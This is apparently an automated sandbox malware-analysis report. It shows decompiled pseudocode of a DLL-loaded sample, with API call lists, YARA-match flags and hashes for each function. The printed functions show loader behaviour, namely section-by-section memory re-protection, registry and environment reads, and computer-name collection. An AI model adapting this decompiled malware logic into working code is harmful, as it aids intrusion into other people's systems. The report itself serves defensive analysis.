				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00ECA72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xecd27c; // 0x213a5a8
				_t4 = _t24 + 0xecede0; // 0x3009388
				_t5 = _t24 + 0xeced88; // 0x4f0053
				_t26 = E00EC1262( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xecd27c; // 0x213a5a8
						_t11 = _t32 + 0xecedd4; // 0x300937c
						_t48 = _t11;
						_t12 = _t32 + 0xeced88; // 0x4f0053
						_t55 = E00EC7CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0xecd27c; // 0x213a5a8
							_t13 = _t35 + 0xecee1e; // 0x30314549
							if(E00EC89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0xecd25c - 6;
								if( *0xecd25c <= 6) {
									_t42 =  *0xecd27c; // 0x213a5a8
									_t15 = _t42 + 0xecec2a; // 0x52384549
									E00EC89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0xecd27c; // 0x213a5a8
							_t17 = _t38 + 0xecee18; // 0x30093c0
							_t18 = _t38 + 0xecedf0; // 0x680043
							_t40 = E00EC2659(_v8, 0x80000001, _t55, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0xecd238, 0, _t55);
						}
					}
					HeapFree( *0xecd238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00EC1F99(_t54);
				}
				return _t45;
			}


















                                                  0x00ec73fd
                                                  0x00ec740d
                                                  0x00ec7410
                                                  0x00ec7417
                                                  0x00ec7419
                                                  0x00ec7419
                                                  0x00ec741c
                                                  0x00ec7421
                                                  0x00ec7428
                                                  0x00ec7435
                                                  0x00ec743a
                                                  0x00ec743e
                                                  0x00ec744c
                                                  0x00ec745a
                                                  0x00ec745e
                                                  0x00ec74ef
                                                  0x00ec74ef
                                                  0x00ec7464
                                                  0x00ec7464
                                                  0x00ec7469
                                                  0x00ec7469
                                                  0x00ec7470
                                                  0x00ec747c
                                                  0x00ec747e
                                                  0x00ec7480
                                                  0x00ec7482
                                                  0x00ec7489
                                                  0x00ec749b
                                                  0x00ec749d
                                                  0x00ec74a4
                                                  0x00ec74a6
                                                  0x00ec74ad
                                                  0x00ec74b8
                                                  0x00ec74b8
                                                  0x00ec74a4
                                                  0x00ec74bd
                                                  0x00ec74c2
                                                  0x00ec74c9
                                                  0x00ec74d9
                                                  0x00ec74e7
                                                  0x00ec74e9
                                                  0x00ec74e9
                                                  0x00ec7480
                                                  0x00ec74fb
                                                  0x00ec74fb
                                                  0x00ec74fd
                                                  0x00ec7502
                                                  0x00ec7504
                                                  0x00ec7504
                                                  0x00ec750f

                                                  APIs
                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03009388,00000000,?,7519F710,00000000,7519F730), ref: 00EC744C
                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,030093C0,?,00000000,30314549,00000014,004F0053,0300937C), ref: 00EC74E9
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00EC6814), ref: 00EC74FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: b60539aa95274b286c4b08d3fe624e07c8379ff1036a006b70403ac2c86facfa
                                                  • Instruction ID: 6929149a5b65e2825f89b4413f7ec2f0f6e4023ef93f72502c36f1d410504eeb
                                                  • Opcode Fuzzy Hash: b60539aa95274b286c4b08d3fe624e07c8379ff1036a006b70403ac2c86facfa
                                                  • Instruction Fuzzy Hash: 8131AF71904108AFDB25DBA1DE85EAA7BECEB44314F2500BAB511B7231D3739E0BDB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401179, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E00401179(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x40414c;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}












                                                  0x00401183
                                                  0x00401190
                                                  0x00401196
                                                  0x004011a2
                                                  0x004011b2
                                                  0x004011b4
                                                  0x004011bc
                                                  0x00401251
                                                  0x00401258
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004011c2
                                                  0x004011c2
                                                  0x004011c2
                                                  0x004011c6
                                                  0x00000000
                                                  0x00000000
                                                  0x004011d2
                                                  0x004011d6
                                                  0x004011fa
                                                  0x004011fe
                                                  0x00401212
                                                  0x00401212
                                                  0x00401218
                                                  0x00401227
                                                  0x0040122b
                                                  0x00401233
                                                  0x00401233
                                                  0x0040123b
                                                  0x0040123e
                                                  0x0040124b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040124b
                                                  0x00401206
                                                  0x0040120a
                                                  0x00401210
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00401210
                                                  0x004011de
                                                  0x004011e2
                                                  0x004011ec
                                                  0x004011e4
                                                  0x004011e4
                                                  0x004011e4
                                                  0x00000000
                                                  0x004011e2
                                                  0x00000000

                                                  APIs
                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 004011B2
                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401227
                                                  • GetLastError.KERNEL32 ref: 0040122D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProtectVirtual$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1469625949-0
                                                  • Opcode ID: 8bb0aca2ff9882565cae59be436ace9633660c54e8d7f472d76362242ea637b4
                                                  • Instruction ID: e0497764a4c06b5612b956a562527d162aa7cc70331ed511b9c3235716ceee51
                                                  • Opcode Fuzzy Hash: 8bb0aca2ff9882565cae59be436ace9633660c54e8d7f472d76362242ea637b4
                                                  • Instruction Fuzzy Hash: 21217131801206EFCB14DF95C985AAAF7F5FF58319F0048AED102B7594E37CA695CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00ECA66E, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00ECA66E(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t1 =  &_a4; // 0xec685f
				_t2 =  &_a4; // 0xec685f
				_t7 = E00EC7323(__edx, __edi,  *_t2, _t1); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E00EC9039(_a4);
				}
				return _t13;
			}





                                                  0x00eca672
                                                  0x00eca676
                                                  0x00eca67a
                                                  0x00eca67f
                                                  0x00eca683
                                                  0x00eca68a
                                                  0x00eca695
                                                  0x00eca699
                                                  0x00eca699
                                                  0x00eca6a2

                                                  APIs
                                                    • Part of subcall function 00EC7323: memcpy.NTDLL(00000000,00000090,00000002,00000002,_h,00000008,_h,_h,?,00EC858C,_h), ref: 00EC7359
                                                    • Part of subcall function 00EC7323: memset.NTDLL ref: 00EC73CF
                                                    • Part of subcall function 00EC7323: memset.NTDLL ref: 00EC73E3
                                                  • memcpy.NTDLL(00000002,?,00000000,00000002,_h,_h,_h,?,00EC858C,_h,?,00EC685F,00000002,?,?,00EC2417), ref: 00ECA68A
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset$FreeHeap
                                                  • String ID: _h$_h
                                                  • API String ID: 3053036209-1171608278
                                                  • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                  • Instruction ID: 6f600978687e6242bb8ce96b25ddb4f4b16d4c30d3b49cc84a0b7432b4b7d247
                                                  • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                  • Instruction Fuzzy Hash: 6DE08633404628B6C7122A94DD01FFF7FAD9F41790F045029FE4869202D623D95197E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC3DD9, Relevance: 3.9, APIs: 3, Instructions: 155stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E00EC3DD9(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0xecd27c; // 0x213a5a8
				_t5 = _t40 + 0xecee40; // 0x410025
				_t85 = E00EC6A12(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E00EC9039(_v16);
					goto L24;
				}
				if(E00ECA72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E00EC809F(0,  *0xecd33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0xecd27c; // 0x213a5a8
					_t11 = _t52 + 0xece81a; // 0x65696c43
					_t55 = E00EC809F(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E00EC6BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E00EC9039(_t87);
					}
					if(_t80 != 0) {
						L17:
						E00EC9039(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E00EC1F99(_t86);
						}
						goto L22;
					} else {
						if(( *0xecd260 & 0x00000001) == 0) {
							L14:
							E00EC8F83(_t80, _v88, _v84,  *0xecd270, 0);
							_t80 = E00EC1C74(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E00EC42EA( &_v40, 0);
							}
							E00EC9039(_v88);
							goto L17;
						}
						_t67 =  *0xecd27c; // 0x213a5a8
						_t18 = _t67 + 0xece823; // 0x65696c43
						_t70 = E00EC809F(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E00EC6BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E00EC9039(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}


























                                                  0x00ec3deb
                                                  0x00ec3dee
                                                  0x00ec3df5
                                                  0x00ec3dfb
                                                  0x00ec3dfc
                                                  0x00ec3dfd
                                                  0x00ec3dfe
                                                  0x00ec3dff
                                                  0x00ec3e00
                                                  0x00ec3e08
                                                  0x00ec3e14
                                                  0x00ec3e18
                                                  0x00ec3e1b
                                                  0x00ec3f6b
                                                  0x00ec3f6e
                                                  0x00ec3f72
                                                  0x00ec3f72
                                                  0x00ec3e2d
                                                  0x00ec3e35
                                                  0x00ec3f5e
                                                  0x00ec3f5f
                                                  0x00ec3f62
                                                  0x00000000
                                                  0x00ec3f62
                                                  0x00ec3e47
                                                  0x00ec3e49
                                                  0x00ec3e49
                                                  0x00ec3e54
                                                  0x00ec3e5b
                                                  0x00ec3e5e
                                                  0x00ec3f4d
                                                  0x00000000
                                                  0x00ec3e64
                                                  0x00ec3e64
                                                  0x00ec3e69
                                                  0x00ec3e72
                                                  0x00ec3e77
                                                  0x00ec3e80
                                                  0x00ec3ea3
                                                  0x00ec3e82
                                                  0x00ec3e98
                                                  0x00ec3e9a
                                                  0x00ec3e9a
                                                  0x00ec3ea6
                                                  0x00ec3f41
                                                  0x00ec3f44
                                                  0x00ec3f4e
                                                  0x00ec3f4e
                                                  0x00ec3f53
                                                  0x00ec3f55
                                                  0x00ec3f55
                                                  0x00000000
                                                  0x00ec3eac
                                                  0x00ec3eb3
                                                  0x00ec3ef4
                                                  0x00ec3f05
                                                  0x00ec3f1b
                                                  0x00ec3f1f
                                                  0x00ec3f24
                                                  0x00ec3f2a
                                                  0x00ec3f37
                                                  0x00ec3f37
                                                  0x00ec3f3c
                                                  0x00000000
                                                  0x00ec3f3c
                                                  0x00ec3eb5
                                                  0x00ec3eba
                                                  0x00ec3ec3
                                                  0x00ec3ec8
                                                  0x00ec3ecc
                                                  0x00ec3eef
                                                  0x00ec3ece
                                                  0x00ec3ee4
                                                  0x00ec3ee6
                                                  0x00ec3ee6
                                                  0x00ec3ef2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec3ef2
                                                  0x00ec3ea6

                                                  APIs
                                                  • memset.NTDLL ref: 00EC3DEE
                                                    • Part of subcall function 00EC6A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00EC3E14,00410025,00000005,?,00000000), ref: 00EC6A23
                                                    • Part of subcall function 00EC6A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00EC6A40
                                                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00EC3E22
                                                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00EC3E2D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                  • String ID:
                                                  • API String ID: 3817122888-0
                                                  • Opcode ID: d91cd82cd713eb0b95d699b30c93a78270e2dfb06910d21f9164972f50a84ec1
                                                  • Instruction ID: 04eecbe9f253c59500fed232a0ed5651ea6f6317a518692501bcc94f07549cfd
                                                  • Opcode Fuzzy Hash: d91cd82cd713eb0b95d699b30c93a78270e2dfb06910d21f9164972f50a84ec1
                                                  • Instruction Fuzzy Hash: 0E415071A01218AEDB11AFF5CE85EEE7BBCAF08344B14953EB901F6111D6739E0A8790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC9152, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 75%
                                                  			E00EC9152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00EC3AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xecd27c; // 0x213a5a8
						_t20 = _t68 + 0xece1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00EC7C14(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                  0x00ec9158
                                                  0x00ec915b
                                                  0x00ec916b
                                                  0x00ec9174
                                                  0x00ec9178
                                                  0x00ec9246
                                                  0x00ec924c
                                                  0x00ec924c
                                                  0x00ec9192
                                                  0x00ec9197
                                                  0x00ec919b
                                                  0x00ec91a1
                                                  0x00ec91a6
                                                  0x00ec91ad
                                                  0x00ec91bc
                                                  0x00ec91bc
                                                  0x00ec91c0
                                                  0x00ec91c2
                                                  0x00ec91ce
                                                  0x00ec91d9
                                                  0x00ec91e4
                                                  0x00ec91e8
                                                  0x00ec91f2
                                                  0x00ec91f6
                                                  0x00ec91f8
                                                  0x00ec91fd
                                                  0x00ec9204
                                                  0x00ec9214
                                                  0x00ec9214
                                                  0x00ec91fd
                                                  0x00ec91f6
                                                  0x00ec9216
                                                  0x00ec921b
                                                  0x00ec9220
                                                  0x00ec9220
                                                  0x00ec9226
                                                  0x00ec922c
                                                  0x00ec9231
                                                  0x00ec9231
                                                  0x00ec9236
                                                  0x00ec923b
                                                  0x00ec923b
                                                  0x00ec9236
                                                  0x00ec91c0
                                                  0x00ec923d
                                                  0x00ec9243
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00EC3AEF: SysAllocString.OLEAUT32(80000002), ref: 00EC3B46
                                                    • Part of subcall function 00EC3AEF: SysFreeString.OLEAUT32(00000000), ref: 00EC3BAB
                                                  • SysFreeString.OLEAUT32(?), ref: 00EC9231
                                                  • SysFreeString.OLEAUT32(00EC1885), ref: 00EC923B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 986138563-0
                                                  • Opcode ID: 0de84182f6db0f151a75aea4036ddf8b7e905395c6b4425033037d1950140182
                                                  • Instruction ID: 635fb2be07ec2026dd11456b085abac0a77aea222359f656bb1b315b251a026c
                                                  • Opcode Fuzzy Hash: 0de84182f6db0f151a75aea4036ddf8b7e905395c6b4425033037d1950140182
                                                  • Instruction Fuzzy Hash: 52319A72900108BFCB14DFA5D988C9BBBBAFFC97407154658F805AB221E2329D52CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040135A, Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040135A() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x404150;
				if( *0x40412c > 5) {
					_t16 = _t15 + 0x4050f9;
				} else {
					_t16 = _t15 + 0x4050b1;
				}
				E00401FE7(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E00401414( &_v32,  &_v16,  *0x40414c ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x404138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E0040102F(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x404138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E0040200D(_t44, _t32 + 4);
						}
					}
					_t25 = E00401E11(_v28); // executed
				}
				ExitThread(_t25);
			}















                                                  0x00401360
                                                  0x00401371
                                                  0x0040137b
                                                  0x00401373
                                                  0x00401373
                                                  0x00401373
                                                  0x00401382
                                                  0x0040138b
                                                  0x00401390
                                                  0x004013ae
                                                  0x00401405
                                                  0x004013b0
                                                  0x004013b6
                                                  0x004013bc
                                                  0x004013ca
                                                  0x004013ce
                                                  0x004013d5
                                                  0x004013d7
                                                  0x004013e3
                                                  0x004013e5
                                                  0x004013f4
                                                  0x004013e7
                                                  0x004013ed
                                                  0x004013ed
                                                  0x004013e5
                                                  0x004013fc
                                                  0x004013fc
                                                  0x00401407

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitThreadlstrlen
                                                  • String ID:
                                                  • API String ID: 2636182767-0
                                                  • Opcode ID: d0f5276c7d2ce7e0a5e41471ba7a2c6755e937518a4a13e4d3d01d1591e5aeb6
                                                  • Instruction ID: 89559214658415b618ba5696c5fb43bb06a1630c8a8f3c3b56ffde9c1baf62f0
                                                  • Opcode Fuzzy Hash: d0f5276c7d2ce7e0a5e41471ba7a2c6755e937518a4a13e4d3d01d1591e5aeb6
                                                  • Instruction Fuzzy Hash: C711BB71408205AFE711EBA5CD48D9B77ECEB48304F01083AB645FB1B1E734E5458B9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC1A03, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(00EC8B1E), ref: 00EC1A1D
                                                    • Part of subcall function 00EC9152: SysFreeString.OLEAUT32(?), ref: 00EC9231
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC1A5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 986138563-0
                                                  • Opcode ID: 79f16543701ff521e4cf2ae542eb7ef777d999a84c30e8af1ebef881bd1dc54c
                                                  • Instruction ID: ba5c5748012c9819af4d69cf2f60bd39d23488d5f1f78bf25959d9b1bea8a17f
                                                  • Opcode Fuzzy Hash: 79f16543701ff521e4cf2ae542eb7ef777d999a84c30e8af1ebef881bd1dc54c
                                                  • Instruction Fuzzy Hash: E601A27250110ABFCB109FA9CD09D9F7BB8FF48350B114065FA09F2220D3319A1ACBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC54BC, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E00EC54BC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00EC2049(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00EC9039(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                  0x00ec54c1
                                                  0x00ec54cc
                                                  0x00ec54ce
                                                  0x00ec54d4
                                                  0x00ec54d6
                                                  0x00ec54db
                                                  0x00ec54e4
                                                  0x00ec54e8
                                                  0x00ec54f1
                                                  0x00ec54f5
                                                  0x00ec5504
                                                  0x00ec54f7
                                                  0x00ec54f8
                                                  0x00ec54fd
                                                  0x00ec54fd
                                                  0x00ec54f5
                                                  0x00ec54e8
                                                  0x00ec550d

                                                  APIs
                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00ECA306,7519F710,00000000,?,?,00ECA306), ref: 00EC54D4
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00ECA306,00ECA307,?,?,00ECA306), ref: 00EC54F1
